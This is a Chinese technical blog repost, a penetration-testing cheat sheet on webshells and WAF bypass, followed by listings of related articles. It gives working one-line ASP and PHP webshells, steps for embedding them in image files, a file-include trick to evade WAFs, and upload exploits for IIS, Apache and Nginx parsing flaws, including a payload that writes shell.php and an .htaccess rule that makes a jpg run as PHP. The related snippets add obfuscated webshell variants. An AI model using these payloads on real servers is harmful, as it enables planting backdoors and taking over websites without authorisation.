渗透:WAF&木马

最新推荐文章于 2023-02-25 14:09:06 发布
最新推荐文章于 2023-02-25 14:09:06 发布
阅读量192 收藏
点赞数
文章标签: php shell 运维
原文链接:http://www.cnblogs.com/bl8ck/p/9520956.html
版权

一句话木马

asp:<%eval request("heroes")%>

php:<?php @eval($_POST[value]);?>

asp:<%@ Page Language="Jscript"%>

       <%eval(Request.Item["value"])%>

一句话木马制作:

c32:把图片放入里边,再写入一句话

cmd:copy /b 1.jpg+1.asp 2.jpg

win7下右键图片,在属性->详细信息->版权内插入一句话

 

小马体积小,容易隐藏,与图片结合一起上传后可以利用nigx或者IIS6的解析漏洞来运行,不过功能少,一般只有上传等功能。

大马体积比较大,一般50K以上。功能丰富,一般包含提权命令,磁盘管理,数据库连接接口,执行命令,有些甚至可以压缩/解压缩网站程序。这种马的隐蔽性较差,大多数代码如果不加密的话会被杀。

 

文件包含绕过waf

1,上传包含文件bao.asp:<!--include file="1.jpg"--> 将当前文件目录下1.jpg包含到asp中执行

2,上传图片文件1.jpg:其中其实是木马

waf不会发现1.jpg中的内容,也不会对包含文件进行拦截,因为其中没有恶意代码。

 

文件解析漏洞

一些特殊文件被iis、apache、nginx在某种情况下被解释成脚本文件的漏洞。

 

IIS5.x-6.0解析漏洞

1,目录解析:/xx.asp/1.jpg

在网站文件夹下建立文件夹名字为.asp、.asa的文件夹,其目录内的任何扩展名的文件都会被IIS当成asp文件来解释或执行

2,文件解析:cracer.asp;.jpg

在IIS6.0下,分号后边的不被解析。除了asp之外还有.asa/.cer/.cdx

 

Apache解析漏洞

Apache从右向左开始判断解析,如果为不可识别解析,就再往左判断。比如cracer.php.owf.rar,“.owf”和".rar"Apache不能识别,于是就会最终解析成cracer.php

 

IIS7.0/IIS7.5/Nginx<8.03畸形解析漏洞

在默认Fast-CGI开启的状况下,上传一个名为cracer.jpg的文件,其中内容为<? PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>然后访问cracer.jpg/.php,在这个目录下就会生成一句话木马shell.php

www.xxx.com/logo.gif/*.php触发漏洞(有漏洞会把前面文件当成php执行)

 

htaccess文件解析

如果在Apache中,.htaccess可被执行且可被上传,则可以尝试在其中写入:

<FilesMatch "shell.jpg">  SetHandler application/x-httpd-php  </FilesMatch>

然后再上传shell.jpg木马,这样就可以将其解析成.php文件

 

转载于:https://www.cnblogs.com/bl8ck/p/9520956.html

E4857632
关注
绕过WAF运行命令执行漏洞的方法大全
hackzkaq的博客
10-09 2260
文章目录**前言****一、windows下**二、进入linux三、一个有趣的例子总结 前言 作者:掌控安全-桐镜 今天发散一下思维,聊聊关于命令执行漏洞绕过过滤的方法,让我们一起由浅入深。 一、windows下 1.1 符号与命令的关系 在看一个例子开始之前,首先了解一点,”和^这还有成对的圆括号()符号并不会影响命令的执行。在windows环境下,命令可以不区分大小写 whoami //正常执行 w"h"o"a"m"i //正常执行 w"h"o"a"m"i" //正常执行 wh"“oami //正常执
图片木马---web渗透学习
Packet_Lee的博客
04-05 1269
在《文件上传漏洞—Web渗透学习》一文中讲到在高安全级别(有较强安全意识的开发人员)中,开放人员定义了用户上传文件的扩展名,只有文件扩展名是jpg、JPG、jpeg、JPEG等文件才允许上传。通过代理服务器等方法无法对其进行渗透。 通过文件包含漏洞的渗透方法和文件上传漏洞的方法结合,可以成功渗透文件上传漏洞中的高安全级别。 原理: 我们在高安全级别中真实的长传一张图片,但在通过图片编辑软件,将ph...
WAF渗透攻防实践(16)
最新发布
yyj1781572的博客
02-25 774
通过该实验了解基于规则的WAF的工作原理,通过分析相关防御规则,尝试使用多种方法进行绕过,使读者直观感受攻防双方的博弈过程。
深入浅出玩转php一句话(含过waf新姿势)
wjy397的专栏
01-10 1万+
本帖最后由 sucppVK 于 2017-1-9 14:39 编辑 一、前言 本文原创作者:XXX,本文属i春秋原创奖励计划,未经许可禁止转载! 各个论坛出了不少过waf的一句话 可笔者见还是有不少小白没有理解一句话(只知道是拿来链接菜刀) 今天打算做一篇面向初学者的教程,总结知识点,抛砖引玉。 让小白从彻底理解马的含义,到打造属于自己过waf的马。 ----
一句话图片木马的制作
netuser1937的博客
12-19 1万+
一句话图片木马的制作
iis6漏洞利用(x.asp;y.jpg篇)
05-10 1181
iis6下的一个解析漏洞1.asp;2.jpg或1.asp;jpg上传1.asp;2.jpg,出现Invalid file.无法上传加gif89a绕过验证,结果也不行。又后想到用一句话木马,保存为1.asp;2.jpg上传。成功上传得到路径/userfiles/image/1_asp;2.jpg发现1.asp又被替换成1_asp了。把1.asp;2.jpg改为1.asp;j
Python安全开发——多线程Fuzz&Waf 异或免杀&爆破
qi_SJQ_的博客
02-23 1468
1.概述: 知识点: 协议模块使用,Request 爬虫技术,简易多线程技术,编码技术,Bypass 后门技术 目的: 掌握利用强大的模块实现各种协议连接操作(爆破或利用等),配合 Fuzz 吊打 WAF 等 2.简单多线程技术、FTP 模块实现协议爆破脚本: queue,threading 模块使用、ftplib 模块使用:遍历用户及密码字典、尝试连接执行命令判断 ftp模块使用:https://www.cnblogs.com/xiao-apple36/p/9675185.html https://
web漏洞扫描器原理_黑客秘籍:基于WAF日志的扫描器检测实践
weixin_39746869的博客
11-19 1040
Web扫描器通过构造特殊请求的方式,对Web系统可能存在的安全漏洞进行扫描,是渗透工作的必备工具。本文尝试从扫描器检测方向出发,根据扫描器的功能和所产生的请求内容对其进行分类,结合苏宁Web应用防火墙(WAF)日志数据,分别展示了规则模型、统计特征模型和基于n-gram的的MLP模型在Web扫描器识别上的简单实践效果,供大家参考。一. 扫描器概览图1 - 扫描器分类1 敏感内容扫描俗话说知己知彼方...
WAF绕过--小马绕过
wwxxee
05-17 875
WAF绕过之小马免杀 WAF:安全狗-Apache版 v4 正常的PHP一句话木马: <?php eval($_REQUEST[6]);?> 对于这个正常的一句话木马,安全狗会拦截。 关于拦截其实最主要的还是测试,看看Waf究竟怎么拦截。[最直接的检测应该是正则匹配] 我们尝试只写<?php eval();?> 发现没有拦截,但是加了REQUEST[6]就拦截了那么我们是不是可以尝试测试看看究竟拦截_REQUEST[6]就拦截了 那么我们是不是可以尝试测试看看究竟拦截R​EQUES
WEB渗透技术:查找目录与SQL注入解析
描述中提到的`exec sp_makewebtask`是SQL Server的一个存储过程,可以用来创建Web任务,这里被用于演示如何写入一句话木马。攻击者可能会利用这个过程,结合SQL注入漏洞,将恶意脚本写入服务器,从而获取远程执行...
一句话图片码
Hydra的博客
11-06 5491
做到了一个上传绕过的题,随便不管用,但复习一下 windows下,在cmd中通过copy中可以实现文件捆绑, 利用 命令 copy 1.jpg/b+1.php 2.php.jpg ||b是二进制,a为ascii码 可以实现图片中藏马, 如果要绕过前端上传的,可以使用00截断,利用bp抓包修改.为00 在上传的时候,当文件系统读到”0X00″时,会认为文件已经结束,从而将2.php...
文件解析漏洞总结-IIS
1stPeak's Blog
03-24 1317
IIS6.0解析漏洞 环境搭建:Windows Server 2003 漏洞一: 当目标服务器禁止上传.asp后缀的文件时,可以使用.cer或.asa后缀绕过,这两个后缀名依旧当做asp文件解析执行 例:有peak.cer和peak.asa,其内容都是 <% response.write("Hello World!") %> 漏洞二: 在网站中建立*.asp或*.asa的文件夹时...
常见的WAF绕过方法
武天旭的博客
02-11 1万+
本篇文章通过网络架构层、HTTP协议层、第三方应用层讲解了绕过WAF的常见方法 一、网络架构层 一般通过域名指向云WAF地址后反向实现代理,找到这些公司的服务器的真实IP即可实现绕过。 具体方法如下: 1、查找相关的二级域名及同一域名注册者的其他域名解析记录。 2、通过查看邮件MX解析记录来发现真实服务器的IP记录或网段,例如: windows可以执行命令: nslookup -qt=mx baidu.com Linux可以执行如下命令来查看baidu.com域名的MX解析...
一句话木马、中国菜刀、图片一句话制作、过狗一句话
热门推荐
weixin_44722125的博客
04-18 2万+
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。
渗透之——asp图片木马的制作和使用
冰河的专栏
12-11 1万+
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84959588 主要亮点:图片木马(可以正常打开显示的木马) 先看代码: 仅需几步:图片和一句话木马合并,制作可以正常显示的图片木马。 1、找一张图片,名字改成1.jpg 2、&lt;%eval request(“a”)%&gt;存为1.asp(就是一句话木马) 3、copy ...
windows下开源免费waf防火墙,附可用资源包
mlichenfeng的博客
11-09 4386
基于ApacheModSecurity 的waf防火墙,ModSecurity简介如下: ModSecurity最开始是一个Apache的安全模块,后来发展成为开源的、跨平台的WEB应用防火墙。它可以通过检查WEB服务接收到的数据,以及发送出去的数据来对网站进行安全防护。 最厉害的是著名安全社区OWASP,开发和维护着一套免费的应用程序保护规则,这就是所谓OWASP的ModSecurit...
绕过WAF-一句话木马
qq_30787769的博客
12-10 2653
注:本次的测试环境是最新的安全狗Apache:V4.0 一句话木马:<?php eval($_REQUEST['a'])?> 1.但是这样写容易被安全狗这些拦截,所以可以考虑替换某些函数,比如eval换成assert()或者reate_function()或者是call_user_func() 2.使用end()函数来代替,可以写成: <?php eval(end($_REQUE...
变形的一句话木马
时光凉春衫薄的博客
10-14 1607
变形的一句话木马 下图是一个解析的东西:这是个一句话木马的变形通过异或运算来规避所有的敏感函数。。。 <?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?&gt...
Nginx配置深度解析:WAF与安全防护
在配置文件中,我们可以实现多种功能,如Web应用防火墙(WAF)、文档传输、IP限制等。 Nginx的作用及意义: 1. 反向代理:Nginx作为反向代理服务器,可以隐藏后端真实服务器的IP地址,提高安全性,并可以实现负载...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值